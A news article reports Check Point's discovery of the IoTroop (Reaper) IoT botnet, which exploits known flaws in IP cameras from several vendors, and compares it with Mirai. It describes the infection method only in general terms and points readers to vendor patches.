Cyber clouds are now gathering for what looks to be a major new storm. Fresh off the heals of the Mirai botnet that launched massive DDoS attacks across the internet last year, a new IoT botnet has been spotted that could be even more damaging.

Check Point researchers have recently uncovered the botnet and named it IoTroop. IoT stands for Internet of Things and refers to the growing number of smart devices that connect to the internet that aren’t traditional computing devices – say, a sprinkler system that can be managed remotely or a smart garage controller. IoT botnets are damaging in large part due to the sheer number of these devices, many of which still have default usernames and passwords.

That was certainly made evident when Marai struck in 2016. By launching an attack on DNS service provider Dyn, Marai was able to disrupt accessibility for popular sites such as Github, Twitter, Netflix, Reddit and Airbnb.

Check Point’s Intrusion Prevention System first detected the botnet in late September. It has been seen evolving to exploit known vulnerabilities in wireless IP cameras by manufacturers TP-link, GoAhead, D-Link, Linksysl, AVTECH, NETGEAR, MikroTik and more. Even scarier, the attack itself was being carried out by previously compromised IoT devices themselves.

From analyzing one infected node, researcher’s were able to get a glimpse of how the attack is carried out. They found a GoAhead camera with an open Port 81 over TCP. The System.ini file that contains the devices configuration was modified with a ‘Netcat’ command that opened up a shell to the attacker’s IP.

There are no predictions on when the attack will come, but right now we are seeing the recruitment stage of the botnet before a huge attack inevitably comes.

Netlab 360, which dubbed the botnet “Reaper”, states that the malware was designed to propagate more stealthily than Mirai. As of now they recommend using Netlab’s security advisory for Reaper to find vendor patches.